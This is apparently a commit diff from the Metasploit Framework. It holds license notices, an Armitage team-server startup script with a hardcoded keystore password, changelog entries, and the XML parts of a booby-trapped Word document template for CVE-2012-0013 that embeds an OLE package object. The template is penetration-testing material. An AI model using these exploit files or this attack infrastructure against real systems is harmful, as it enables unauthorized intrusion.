+  8. You may not copy, modify, sublicense, link with, or distribute
+the Library except as expressly provided under this License.  Any
+attempt otherwise to copy, modify, sublicense, link with, or
+distribute the Library is void, and will automatically terminate your
+rights under this License.  However, parties who have received copies,
+or rights, from you under this License will not have their licenses
+terminated so long as such parties remain in full compliance.
+
+  9. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Library or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Library (or any work based on the
+Library), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Library or works based on it.
+
+  10. Each time you redistribute the Library (or any work based on the
+Library), the recipient automatically receives a license from the
+original licensor to copy, distribute, link with or modify the Library
+subject to these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties with
+this License.
+
+  11. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Library at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Library by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Library.
+
+If any portion of this section is held invalid or unenforceable under any
+particular circumstance, the balance of the section is intended to apply,
+and the section as a whole is intended to apply in other circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  12. If the distribution and/or use of the Library is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Library under this License may add
+an explicit geographical distribution limitation excluding those countries,
+so that distribution is permitted only in or among countries not thus
+excluded.  In such case, this License incorporates the limitation as if
+written in the body of this License.
+
+  13. The Free Software Foundation may publish revised and/or new
+versions of the Lesser General Public License from time to time.
+Such new versions will be similar in spirit to the present version,
+but may differ in detail to address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Library
+specifies a version number of this License which applies to it and
+"any later version", you have the option of following the terms and
+conditions either of that version or of any later version published by
+the Free Software Foundation.  If the Library does not specify a
+license version number, you may choose any version ever published by
+the Free Software Foundation.
+
+  14. If you wish to incorporate parts of the Library into other free
+programs whose distribution conditions are incompatible with these,
+write to the author to ask for permission.  For software which is
+copyrighted by the Free Software Foundation, write to the Free
+Software Foundation; we sometimes make exceptions for this.  Our
+decision will be guided by the two goals of preserving the free status
+of all derivatives of our free software and of promoting the sharing
+and reuse of software generally.
+
+			    NO WARRANTY
+
+  15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO
+WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW.
+EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
+OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY
+KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE
+LIBRARY IS WITH YOU.  SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME
+THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
+
+  16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN
+WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY
+AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU
+FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR
+CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE
+LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING
+RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A
+FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF
+SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
+DAMAGES.
+
+		     END OF TERMS AND CONDITIONS
+
+````
+
+
+
+OpenSSL
+=======
+ - The OpenSSL library embedded into the Meterpreter payload binaries and the
+   corresponding header files in the source tree
+
+````
+The OpenSSL toolkit stays under a dual license, i.e. both the conditions of
+the OpenSSL License and the original SSLeay license apply to the toolkit.
+See below for the actual license texts. Actually both licenses are BSD-style
+Open Source licenses. In case of any license issues related to OpenSSL
+please contact openssl-core@openssl.org.
+
+OpenSSL License
+---------------
+/* ====================================================================
+ * Copyright (c) 1998-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT `AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+ Original SSLeay License
+ -----------------------
+
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG `AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+````
+
+
+MIT
+===
+ - The SSHKey library located under lib/sshkey.
+   Copyright (c) 2011 James Miller
+ - The Net::SSH library located under lib/net/ssh.
+   Copyright (c) 2008 Jamis Buck <jamis@37signals.com>
+ - Anemone located under lib/anemone
+   Copyright (c) 2009 Vertive, Inc.
+ - RKelly located under lib/rkelly/
+   Copyright (c) 2007, 2008, 2009 Aaron Patterson, John Barnette
+ - Gem components located under lib/gemcache
+   * actionmailer - Copyright (c) 2004-2011 David Heinemeier Hansson
+   * actionpack - Copyright (c) 2004-2011 David Heinemeier Hansson
+   * activemodel - Copyright (c) 2004-2011 David Heinemeier Hansson
+   * activerecord - Copyright (c) 2004-2011 David Heinemeier Hansson
+   * activeresource - Copyright (c) 2006-2011 David Heinemeier Hansson
+   * activesupport - Copyright (c) 2005-2011 David Heinemeier Hansson
+   * authlogic - Copyright (c) 2011 Ben Johnson of Binary Logic
+   * carrierwave - Copyright (c) 2008-2012 Jonas Nicklas
+   * chunky_png - Copyright (c) 2010 Willem van Bergen
+   * daemons - Copyright (c) 2005-2012 Thomas Uehlinger
+   * diff-lcs - Copyright 2004–2011 Austin Ziegler
+   * formtastic - Copyright (c) 2008-2010 Justin French
+   * fssm - Copyright (c) 2011 Travis Tilley
+   * hike - Copyright (c) 2011 Sam Stephenson
+   * i18n - Copyright (c) 2008 The Ruby I18n team
+   * jquery-rails - Copyright (c) 2010 Andre Arko
+   * liquid - Copyright (c) 2005, 2006 Tobias Luetke
+   * method_source - Copyright (c) 2011 John Mair (banisterfiend)
+   * multi_json - Copyright (c) 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
+   * rack - Copyright (c) 2007, 2008, 2009, 2010 Christian Neukirchen <purl.org/net/chneukirchen>
+   * rack-cache - Copyright (c) 2008 Ryan Tomayko <http://tomayko.com/about>
+   * rack-ssl - Copyright (c) 2010 Joshua Peek
+   * rake - Copyright (c) 2003, 2004 Jim Weirich
+   * slop - Copyright (c) 2012 Lee Jarvis
+   * sprockets - Copyright (c) 2011 Sam Stephenson, Copyright (c) 2011 Joshua Peek
+   * state_machine - Copyright (c) 2006-2012 Aaron Pfeifer
+   * thor - Copyright (c) 2008 Yehuda Katz
+   * tilt - Copyright (c) 2010 Ryan Tomayko <http://tomayko.com/about>
+   * treetop - Copyright (c) 2007 Nathan Sobo
+   * tzinfo - Copyright (c) 2005-2006 Philip Ross
+
+
+
+
+````
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
+WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+````
+

data/armitage/teamserver

@@ -0,0 +1,72 @@
+#!/bin/bash
+# start msfrpcd and the deconfliction server. Check for common mistakes
+# to save some time and head scratching...
+
+# check the arguments
+EXPECTED=2
+if [ $# -ne $EXPECTED ]; then
+	echo "[-] You must provide: <external IP address> <team password>"
+	echo "    <external IP address> must be reachable by Armitage"
+	echo "          clients on port 55553"
+	echo "    <team password> is a shared password your team uses to"
+	echo "          authenticate to the Armitage team server"
+	exit
+fi
+
+# check that we're r00t
+if [ $UID -ne 0 ]; then
+	echo "[-] Superuser privileges are required to run the team server"
+	exit 
+fi
+
+# check if java is available...
+if [ $(command -v java) ]; then
+	true
+else
+	echo "[-] java is not in \$PATH"
+	echo "    is Java installed?"
+	exit
+fi
+
+# check if keytool is available...
+if [ $(command -v keytool) ]; then
+	true
+else
+	echo "[-] keytool is not in \$PATH"
+	echo "    install the Java Developer Kit"
+	exit
+fi
+
+# check if msfrpcd is available
+if [ $(command -v msfrpcd) ]; then
+	true
+else
+	echo "[-] msfrpcd is not in \$PATH"
+	echo "    is Metasploit installed?"
+	exit
+fi
+
+# check if msfrpcd is running or not
+if [ "$(pidof msfrpcd)" ]; then
+	echo "[-] msfrpcd is already running. Kill it before running this script"
+	echo "    try: killall -9 msfrpcd"
+	exit
+fi
+
+# generate a certificate
+	# naturally you're welcome to replace this step with your own permanent certificate.
+	# just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
+	# -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
+	# an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
+	# is printed so users may have a chance to verify they're not being owned.
+echo "[+] Generating X509 certificate and keystore (for SSL)"
+rm -f ./armitage.store
+keytool -keystore ./armitage.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias armitage -dname "CN=Armitage Hacker, OU=FastAndEasyHacking, O=Armitage, L=Somewhere, S=Cyberspace, C=Earth"
+
+# start everything up
+echo "[+] Starting RPC daemon"
+msfrpcd -U msf -P $2 -a 127.0.0.1 -p 55554 -S
+echo "[+] sleeping for 20s (to let msfrpcd initialize)"
+sleep 20
+echo "[+] Starting Armitage team server"
+java -Djavax.net.ssl.keyStore=./armitage.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+UseParallelGC -jar armitage.jar --server $1 55554 msf $2 55553

data/armitage/whatsnew.txt

@@ -1,6 +1,114 @@
 Armitage Changelog
 ==================
 
+7 Jun 12 - Adding on to those quick bug fixes / tweaks
+--------
+- Disabled Nagles algorithm for team server and client SSL sockets.
+  This makes team server much more responsive... trust me.
+- Fixed bug preventing Armitage from showing "Started Service" 
+  message when starting the SOCKS Proxy server.
+- Fixed a find feature highlight bug in the View tab.
+
+30 May 12 - A few quick bug fixes / tweaks...
+---------
+- Fixed an exception when killing a session or removing a route 
+  through the UI. 
+- Oooh, ps command added a new column to its output. Updated ps  
+  parser to handle this.
+- Hosts -> Import Hosts now works under Windows again. Had to 
+  escape the filename. *sigh*
+- Hail Mary now sets LHOST option. This is necessary for some 
+  attacks to work properly.
+- Tweaked console create code in beginning of Armitage setup to 
+  hopefully avoid aggravating the evil console.create deadlock
+  condition.
+
+21 May 12
+---------
+- Added a hack to prevent the input area from flickering when the 
+  prompt changes.
+- Updated the color palette to something a little more subtle.
+- Added an optimization to how modules are launched. This will make
+  a difference for team use in high latency situations.
+- Rewrote MSF Scans feature to use console queue. This option is more
+  reliable and it makes the code easier to follow.
+- Added a hack to combine chat message writes with a read request.
+  This will make the event log more responsive in a high latency 
+  situation (can't you tell I care about this "situation")
+- Fixed text highlights through Ctrl+F on Windows. UNIX platforms 
+  were always OK. Another good reason to not use these tools on 
+  Windows. Ever.
+- View -> Downloads Sync Files feature now works on Windows. It looks
+  like leaving those pesky :'s in the file paths is bad.
+
+17 May 12
+---------
+- Fixed bug with loot/download viewer breaking with a font resize.
+- Default console font color is now grey. I never noticed that I had
+  white text on a black background before. That's a lot of contrast.
+  This is adjustable too through Armitage -> Preferences.
+- And... the Armitage console now displays pretty colors. If you don't
+  like colors, set the console.show_colors.boolean preference to false
+  through Armitage -> Preferences.
+- Fixed a bug preventing input field from getting focus when popping a
+  console tab using Ctrl+W.
+
+14 May 12
+---------
+- Oopserific--dynamic workspace shortcuts were not bound until you
+  clicked the Workspaces menu. I fixed that.
+- Improved console pool's ability to detect a dead console. If you saw
+  "null" prompts in an open tab, it's because of a dead console. Fixed
+- Bound Ctrl+Backspace to reset dynamic workspaces. Ctrl+0 is now back
+  to what it originally did (resetting the font size to default).
+- Added Ctrl+T to take a screenshot of the active tab
+- Added Ctrl+W to pop the active tab into its own window
+- Armitage team server is now SSL enabled. The teamserver script (you
+  are using it, right?) generates a certificate for you using keytool.
+  The server presents the SHA1 hash of its certificate. Armitage users
+  have the opportunity to verify and trust the hash of the certificate
+  presented to them or to reject it and not connect.
+- Added Ctrl+Left / Ctrl+Right to quickly navigate through tabs.
+- Added a check to prevent clients from connecting to msfrpcd directly
+  when teaming is enabled.
+- Fixed a bug that prevented command shells from opening on some sessions
+- Team server client now caches certain calls to RPC server.
+- Reworked the Loot/Downloads View button. Now, all highlighted files are
+  displayed in one View tab. This makes searching easier. Each file is
+  displayed with a colored header (to make it easier to tell when one file
+  ends and the other begins). 
+- Added Sync Files button to Loot/Downloads tabs when connected to a team
+  server. This button will download all files associated with the highlighted
+  rows and save them in the Armitage data directory.
+
+7 May 12
+--------
+Note: Armitage team server setup has changed. Refer to the manual for
+the latest information: http://www.fastandeasyhacking.com/manual#7
+
+- Armitage team mode now routes all Metasploit-bound calls through the
+  deconfliction server. Armitage also pools "temporary" Metasploit
+  consoles. It's too bad this is logged as one change, because it's 
+  more like twenty. These changes were motivated by a desire to avoid 
+  triggering a race condition that was introduced w/ Metasploit 4.3.0.
+         http://dev.metasploit.com/redmine/issues/6829
+
+  On the bright side these changes will allow a lot more flexibility 
+  to optimize how Armitage interacts with msfrpcd and to do some neat 
+  things (like logging) in a centralized way.
+- Module description (in module launch dialog) is now resizable.
+- Added Ctrl+D keyboard shortcut to close active tab.
+- Armitage now uses (more robust) console queue for launching post
+  modules, handlers, brute force attacks, and other things.
+- Fixed a race condition in the Jobs tab refresh after killing a job
+- Armitage now filters smb hashes from non-psexec/smb login dialogs.
+- Added armitage.log_data_here.folder setting. This setting lets you
+  specify where Armitage will save its logs, downloaded files, and
+  screenshots. *cough* Some penetration testers like to dump everything
+  to an encrypted volume. *cough*. I apologize it took this long to
+  get this feature in place.
+- Improved perceived responsiveness of a console interaction
+
 17 Apr 12
 ---------
 - Modified how Armitage determines a console command is complete to stay 

data/exploits/CVE-2012-0013/[Content_Types].xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="emf" ContentType="image/x-emf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/stylesWithEffects.xml" ContentType="application/vnd.ms-word.stylesWithEffects+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

data/exploits/CVE-2012-0013/_rels/__rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

data/exploits/CVE-2012-0013/docProps/app.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>1</TotalTime><Pages>1</Pages><Words>2</Words><Characters>13</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>14</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>14.0000</AppVersion></Properties>

data/exploits/CVE-2012-0013/docProps/core.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:creator>Windows User</dc:creator><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>2</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2012-06-07T21:43:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2012-06-07T21:43:00Z</dcterms:modified></cp:coreProperties>

data/exploits/CVE-2012-0013/word/_rels/document.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffects.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/></Relationships>

data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/wordVbaData" Target="vbaData.xml"/></Relationships>

data/exploits/CVE-2012-0013/word/document.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><w:body><w:p w:rsidR="00EB5F66" w:rsidRDefault="006042EE"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:r><w:rPr><w:noProof/></w:rPr><w:pict><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"><v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/><v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:80.2pt;height:40.5pt;z-index:-251657216;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text"><v:imagedata r:id="rId6" o:title=""/></v:shape><o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1026" DrawAspect="Content" ObjectID="_1400592552" r:id="rId7"/></w:pict></w:r><w:bookmarkEnd w:id="0"/><w:r><w:t>W00TW00T</w:t></w:r></w:p><w:sectPr w:rsidR="00EB5F66"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

data/exploits/CVE-2012-0013/word/fontTable.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
